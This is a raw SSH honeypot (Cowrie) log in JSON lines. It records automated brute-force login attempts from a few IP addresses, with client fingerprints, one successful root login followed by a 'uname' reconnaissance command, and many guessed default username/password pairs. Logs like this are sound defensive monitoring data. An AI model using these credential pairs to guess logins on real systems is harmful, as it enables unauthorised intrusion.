{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456","message":"login attempt [ftpuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:29:07.534033Z","src_ip":"194.233.79.134","session":"98783151074b"}
{"eventid":"cowrie.login.failed","username":"user","password":"sasha1","message":"login attempt [user/sasha1] failed","sensor":"my-vps","timestamp":"2025-08-28T03:29:08.215573Z","src_ip":"212.227.235.229","session":"c25a670f9e49"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":35202,"dst_ip":"1.2.3.4","dst_port":22,"session":"3bef34d120f3","protocol":"ssh","message":"New connection: 45.125.211.194:35202 (1.2.3.4:22) [session: 3bef34d120f3]","sensor":"my-vps","timestamp":"2025-08-28T03:29:08.796449Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:29:08.805315Z","src_ip":"45.125.211.194","session":"3bef34d120f3"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:29:08.898953Z","src_ip":"194.233.79.134","session":"98783151074b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:29:09.009589Z","src_ip":"45.125.211.194","session":"3bef34d120f3"}
{"eventid":"cowrie.login.failed","username":"user","password":"pooh","message":"login attempt [user/pooh] failed","sensor":"my-vps","timestamp":"2025-08-28T03:29:09.376990Z","src_ip":"212.227.235.229","session":"c25a670f9e49"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890","message":"login attempt [root/1234567890] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:29:09.835910Z","src_ip":"45.125.211.194","session":"3bef34d120f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:29:10.328637Z","src_ip":"45.125.211.194","session":"3bef34d120f3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:29:10.329369Z","src_ip":"45.125.211.194","session":"3bef34d120f3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:29:10.553720Z","src_ip":"45.125.211.194","session":"3bef34d120f3"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:29:10.554908Z","src_ip":"45.125.211.194","session":"3bef34d120f3"}
{"eventid":"cowrie.login.failed","username":"user","password":"pineappl","message":"login attempt [user/pineappl] failed","sensor":"my-vps","timestamp":"2025-08-28T03:29:11.375723Z","src_ip":"212.227.235.229","session":"c25a670f9e49"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:29:12.537056Z","src_ip":"212.227.235.229","session":"c25a670f9e49"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":16014,"dst_ip":"1.2.3.4","dst_port":22,"session":"52c18e9363c9","protocol":"ssh","message":"New connection: 45.125.211.194:16014 (1.2.3.4:22) [session: 52c18e9363c9]","sensor":"my-vps","timestamp":"2025-08-28T03:29:23.311412Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:29:23.314780Z","src_ip":"45.125.211.194","session":"52c18e9363c9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:29:23.551255Z","src_ip":"45.125.211.194","session":"52c18e9363c9"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"zabbix","message":"login attempt [zabbix/zabbix] failed","sensor":"my-vps","timestamp":"2025-08-28T03:29:24.418726Z","src_ip":"45.125.211.194","session":"52c18e9363c9"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:29:25.641318Z","src_ip":"45.125.211.194","session":"52c18e9363c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56563,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6c51fb0810e","protocol":"ssh","message":"New connection: 212.227.235.229:56563 (1.2.3.4:22) [session: a6c51fb0810e]","sensor":"my-vps","timestamp":"2025-08-28T03:29:26.667559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T03:29:26.669096Z","src_ip":"212.227.235.229","session":"a6c51fb0810e"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T03:29:26.776830Z","src_ip":"212.227.235.229","session":"a6c51fb0810e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"callofduty","message":"login attempt [admin/callofduty] failed","sensor":"my-vps","timestamp":"2025-08-28T03:29:27.289785Z","src_ip":"212.227.235.229","session":"a6c51fb0810e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49728,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b968b73440f","protocol":"ssh","message":"New connection: 212.227.235.229:49728 (1.2.3.4:22) [session: 2b968b73440f]","sensor":"my-vps","timestamp":"2025-08-28T03:29:28.175346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:29:28.175993Z","src_ip":"212.227.235.229","session":"2b968b73440f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"cake","message":"login attempt [admin/cake] failed","sensor":"my-vps","timestamp":"2025-08-28T03:29:28.399122Z","src_ip":"212.227.235.229","session":"a6c51fb0810e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:29:28.420447Z","src_ip":"212.227.235.229","session":"2b968b73440f"}
{"eventid":"cowrie.login.failed","username":"kubernetes","password":"kubernetes","message":"login attempt [kubernetes/kubernetes] failed","sensor":"my-vps","timestamp":"2025-08-28T03:29:29.155245Z","src_ip":"212.227.235.229","session":"2b968b73440f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bunbun","message":"login attempt [admin/bunbun] failed","sensor":"my-vps","timestamp":"2025-08-28T03:29:29.509269Z","src_ip":"212.227.235.229","session":"a6c51fb0810e"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:29:30.401728Z","src_ip":"212.227.235.229","session":"2b968b73440f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"bullwink","message":"login attempt [admin/bullwink] failed","sensor":"my-vps","timestamp":"2025-08-28T03:29:30.618443Z","src_ip":"212.227.235.229","session":"a6c51fb0810e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49282,"dst_ip":"1.2.3.4","dst_port":22,"session":"c762f3a62cc4","protocol":"ssh","message":"New connection: 212.227.125.160:49282 (1.2.3.4:22) [session: c762f3a62cc4]","sensor":"my-vps","timestamp":"2025-08-28T03:29:31.122838Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:29:31.123914Z","src_ip":"212.227.125.160","session":"c762f3a62cc4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:29:31.340351Z","src_ip":"212.227.125.160","session":"c762f3a62cc4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"brunette","message":"login attempt [admin/brunette] failed","sensor":"my-vps","timestamp":"2025-08-28T03:29:31.728542Z","src_ip":"212.227.235.229","session":"a6c51fb0810e"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer123","message":"login attempt [observer/observer123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:29:31.990241Z","src_ip":"212.227.125.160","session":"c762f3a62cc4"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:29:32.840012Z","src_ip":"212.227.235.229","session":"a6c51fb0810e"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:29:33.208089Z","src_ip":"212.227.125.160","session":"c762f3a62cc4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60168,"dst_ip":"1.2.3.4","dst_port":22,"session":"32d74b0e240f","protocol":"ssh","message":"New connection: 212.227.235.229:60168 (1.2.3.4:22) [session: 32d74b0e240f]","sensor":"my-vps","timestamp":"2025-08-28T03:29:33.830607Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:29:33.831583Z","src_ip":"212.227.235.229","session":"32d74b0e240f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:29:34.081503Z","src_ip":"212.227.235.229","session":"32d74b0e240f"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer123","message":"login attempt [observer/observer123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:29:34.826306Z","src_ip":"212.227.235.229","session":"32d74b0e240f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:29:36.082563Z","src_ip":"212.227.235.229","session":"32d74b0e240f"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":11258,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e8afd3fa0ba","protocol":"ssh","message":"New connection: 45.125.211.194:11258 (1.2.3.4:22) [session: 5e8afd3fa0ba]","sensor":"my-vps","timestamp":"2025-08-28T03:29:37.719167Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:29:37.732200Z","src_ip":"45.125.211.194","session":"5e8afd3fa0ba"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:29:37.932822Z","src_ip":"45.125.211.194","session":"5e8afd3fa0ba"}
{"eventid":"cowrie.login.failed","username":"kubernetes","password":"kubernetes","message":"login attempt [kubernetes/kubernetes] failed","sensor":"my-vps","timestamp":"2025-08-28T03:29:38.759330Z","src_ip":"45.125.211.194","session":"5e8afd3fa0ba"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:29:39.969978Z","src_ip":"45.125.211.194","session":"5e8afd3fa0ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42374,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6e69c8b0af3","protocol":"ssh","message":"New connection: 212.227.235.229:42374 (1.2.3.4:22) [session: c6e69c8b0af3]","sensor":"my-vps","timestamp":"2025-08-28T03:29:40.283686Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:29:40.284367Z","src_ip":"212.227.235.229","session":"c6e69c8b0af3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:29:40.543339Z","src_ip":"212.227.235.229","session":"c6e69c8b0af3"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123","message":"login attempt [hadoop/123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:29:41.323125Z","src_ip":"212.227.235.229","session":"c6e69c8b0af3"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:29:42.585665Z","src_ip":"212.227.235.229","session":"c6e69c8b0af3"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":52848,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8c05657e06e","protocol":"ssh","message":"New connection: 45.125.211.194:52848 (1.2.3.4:22) [session: d8c05657e06e]","sensor":"my-vps","timestamp":"2025-08-28T03:29:52.237369Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:29:52.269574Z","src_ip":"45.125.211.194","session":"d8c05657e06e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:29:52.447674Z","src_ip":"45.125.211.194","session":"d8c05657e06e"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer123","message":"login attempt [observer/observer123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:29:53.284112Z","src_ip":"45.125.211.194","session":"d8c05657e06e"}
